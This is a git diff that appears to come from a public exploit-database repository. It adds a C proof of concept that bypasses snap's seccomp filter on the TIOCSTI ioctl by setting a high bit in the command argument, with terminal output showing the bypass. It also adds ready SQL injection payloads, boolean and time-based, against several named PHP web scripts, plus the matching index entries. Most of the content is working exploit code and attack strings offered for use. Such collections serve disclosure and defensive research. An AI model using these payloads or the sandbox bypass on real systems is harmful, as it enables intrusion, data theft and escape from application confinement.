diff --git a/exploits/linux/dos/46594.c b/exploits/linux/dos/46594.c new file mode 100644 index 000000000..86badd7e7 --- /dev/null +++ b/exploits/linux/dos/46594.c @@ -0,0 +1,78 @@ +/* +snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the +source code, this filter is expressed as follows: + + # TIOCSTI allows for faking input (man tty_ioctl) + # TODO: this should be scaled back even more + ioctl - !TIOCSTI + +In the X86-64 version of the compiled seccomp filter, this results in the +following BPF bytecode: + + [...] + 0139 if nr == 0x00000010: [true +0, false +3] + 013b if args[1].high != 0x00000000: [true +205, false +0] -> ret ALLOW (syscalls: ioctl) + 0299 if args[1].low == 0x00005412: [true +111, false +112] -> ret ERRNO + 030a ret ALLOW (syscalls: ioctl) + [...] + +This bytecode performs a 64-bit comparison; however, the syscall entry point for +ioctl() is defined with a 32-bit command argument in the kernel: + +SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg) +{ + return ksys_ioctl(fd, cmd, arg); +} + +This means that setting a bit in the high half of the command parameter will +circumvent the seccomp filter while being ignored by the kernel. + +This can be tested as follows on Ubuntu 18.04. You might have to launch the +GNOME calculator once first to create the snap directory hierarchy, I'm not +sure. + +==================================================================== +user@ubuntu-18-04-vm:~$ cat tiocsti.c +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +static int ioctl64(int fd, unsigned long nr, void *arg) { + errno = 0; + return syscall(__NR_ioctl, fd, nr, arg); +} + +int main(void) { + int res; + char pushmeback = '#'; + res = ioctl64(0, TIOCSTI, &pushmeback); + printf("normal TIOCSTI: %d (%m)\n", res); + res = ioctl64(0, TIOCSTI | (1UL<<32), &pushmeback); + printf("high-bit-set TIOCSTI: %d (%m)\n", res); +} + +/* +user@ubuntu-18-04-vm:~$ gcc -o tiocsti tiocsti.c -Wall +user@ubuntu-18-04-vm:~$ ./tiocsti +#normal TIOCSTI: 0 (Success) +#high-bit-set TIOCSTI: 0 (Success) +user@ubuntu-18-04-vm:~$ ## +user@ubuntu-18-04-vm:~$ cp tiocsti /home/user/snap/gnome-calculator/current/tiocsti +user@ubuntu-18-04-vm:~$ snap run --shell gnome-calculator +[...] +user@ubuntu-18-04-vm:/home/user$ cd +user@ubuntu-18-04-vm:~$ ./tiocsti +normal TIOCSTI: -1 (Operation not permitted) +#high-bit-set TIOCSTI: 0 (Success) +user@ubuntu-18-04-vm:~$ # +user@ubuntu-18-04-vm:~$ pwd +/home/user/snap/gnome-calculator/260 +user@ubuntu-18-04-vm:~$ +==================================================================== +*/ \ No newline at end of file diff --git a/exploits/php/webapps/46591.txt b/exploits/php/webapps/46591.txt new file mode 100644 index 000000000..e712057fd --- /dev/null +++ b/exploits/php/webapps/46591.txt @@ -0,0 +1,43 @@ +# Exploit Title: Matrimony Website Script - Multiple SQL Injection +# Date: 22.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.matri4web.com +# Demo Site: https://www.matrimonydemo.com +# Version: M-Plus +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: http://localhost/[PATH]/simplesearch_results.php +Vulnerable Parameter: txtGender (POST) +Attack Pattern: +Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0 + +----- PoC 2: SQLi ----- + +Request: http://localhost/[PATH]/advsearch_results.php +Vulnerable Parameter: religion (POST) +Attack Pattern: +age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo + +----- PoC 3 - SQLi ----- + +Request: http://localhost/[PATH]/specialcase_results.php +Vulnerable Parameter: Fage +Attack Pattern: +Fage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7 + +----- PoC 4 - SQLi ----- + +Request: http://localhost/[PATH]/locational_results.php +Vulnerable Parameter: cboCountry (POST) +Attack Pattern: +Fage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo + +----- PoC 5 - SQLi ----- + +Request: http://localhost/[PATH]/registration2.php +Vulnerable Parameter: religion (POST) +Attack Pattern: +EMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1 \ No newline at end of file diff --git a/exploits/php/webapps/46592.txt b/exploits/php/webapps/46592.txt new file mode 100644 index 000000000..97a13a641 --- /dev/null +++ b/exploits/php/webapps/46592.txt @@ -0,0 +1,15 @@ +# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection +# Date: 22.03.2019 +# Dork: +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: http://www.meeplace.com +# Demo Site: http://demo.meeplace.com +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +# Request: http://localhost/[PATH]/ad/addclick.php?&id=1 +# Vulnerable Parameter: id (GET) +# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ) \ No newline at end of file diff --git a/exploits/php/webapps/46593.txt b/exploits/php/webapps/46593.txt new file mode 100644 index 000000000..97e018422 --- /dev/null +++ b/exploits/php/webapps/46593.txt @@ -0,0 +1,22 @@ +# Exploit Title: Inout Article Base CMS - SQL Injection +# Date: 21.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/ +# Demo Site: http://www.inoutwebportal.com +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: http://localhost/[PATH]/articles/portalLogin.php +Vulnerable Parameter: p (GET) +Attack Pattern: +http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test + +----- PoC 2: SQLi ----- + +Request: http://localhost/[PATH]/articles/portalLogin.php +Vulnerable Parameter: u (GET) +Attack Pattern: +http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bc0cbf7ae..b4fb924ff 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6367,6 +6367,7 @@ id,file,description,date,author,type,platform,port 46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple, 46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple, 46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows, +46594,exploits/linux/dos/46594.c,"snap - seccomp BBlacklist for TIOCSTI can be Circumvented",2019-03-22,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41033,3 +41034,6 @@ id,file,description,date,author,type,platform,port 46587,exploits/php/webapps/46587.txt,"uHotelBooking System - 'system_page' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80 46588,exploits/php/webapps/46588.txt,"Placeto CMS Alpha v4 - 'page' SQL Injection",2019-03-21,"Abdullah Çelebi",webapps,php,80 46590,exploits/php/webapps/46590.txt,"Bootstrapy CMS - Multiple SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80 +46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 +46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 +46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80